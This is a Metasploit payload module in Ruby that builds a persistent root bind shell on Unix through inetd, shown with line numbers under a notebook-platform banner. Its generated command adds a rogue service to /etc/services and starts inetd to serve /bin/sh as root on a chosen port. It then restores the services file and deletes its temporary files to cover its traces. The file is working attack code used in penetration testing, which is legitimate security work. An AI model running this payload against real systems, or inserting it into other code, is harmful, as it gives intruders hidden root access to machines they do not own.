Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 487
10

11
  include Msf::Payload::Single
12
  include Msf::Sessions::CommandShellOptions
13

14
  def initialize(info = {})
15
    super(merge_info(info,
16
     'Name'          => 'Unix Command Shell, Bind TCP (inetd)',
17
     'Description'   => 'Listen for a connection and spawn a command shell (persistent)',
18
     'Author'        => 'hdm',
19
     'License'       => MSF_LICENSE,
20
     'Platform'      => 'unix',
21
     'Arch'          => ARCH_CMD,
22
     'Handler'       => Msf::Handler::BindTcp,
23
     'Session'       => Msf::Sessions::CommandShell,
24
     'PayloadType'   => 'cmd',
25
     'Privileged'    => true,
26
     'RequiredCmd'   => 'inetd',
27
     'Payload'       =>
28
       {
29
         'Offsets' => { },
30
         'Payload' => ''
31
       }
32
    ))
33
    register_advanced_options(
34
      [
35
        OptString.new('InetdPath', [true, 'The path to the inetd executable', 'inetd']),
36
        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
37
      ]
38
    )
39
  end
40

41
  #
42
  # Constructs the payload
43
  #
44
  def generate(_opts = {})
45
    vprint_good(command_string)
46
    return super + command_string
47
  end
48

49
  #
50
  # Returns the command string to use for execution
51
  #
52
  def command_string
53
    tmp_services = "/tmp/." + Rex::Text.rand_text_alpha(32)
54
    tmp_inet = "/tmp/." + Rex::Text.rand_text_alpha(32)
55
    svc = Rex::Text.rand_text_alpha_lower(9)
56

57
    cmd =
58
      # Create a clean copy of the services file
59
      "cp /etc/services #{tmp_services};" +
60

61
        # Add our service to the system one
62
        "echo #{svc} #{datastore['LPORT']}/tcp>>/etc/services;" +
63

64
        # Create our inetd configuration file with our service
65
        "echo #{svc} stream tcp nowait root #{datastore['ShellPath']} sh>#{tmp_inet};" +
66

67
        # First we try executing inetd without the full path
68
        "#{datastore['InetdPath']} -s #{tmp_inet} ||" +
69

70
        # Next try the standard inetd path on Linux, Solaris, BSD
71
        "/usr/sbin/inetd -s #{tmp_inet} ||" +
72

73
        # Next try the Irix inetd path
74
        "/usr/etc/inetd -s #{tmp_inet};" +
75

76
        # Overwrite services with the "clean" version
77
        "cp #{tmp_services} /etc/services;" +
78

79
        # Delete our configuration file
80
        "rm #{tmp_inet} #{tmp_services};";
81

82
    return cmd
83
  end
84
end
85

86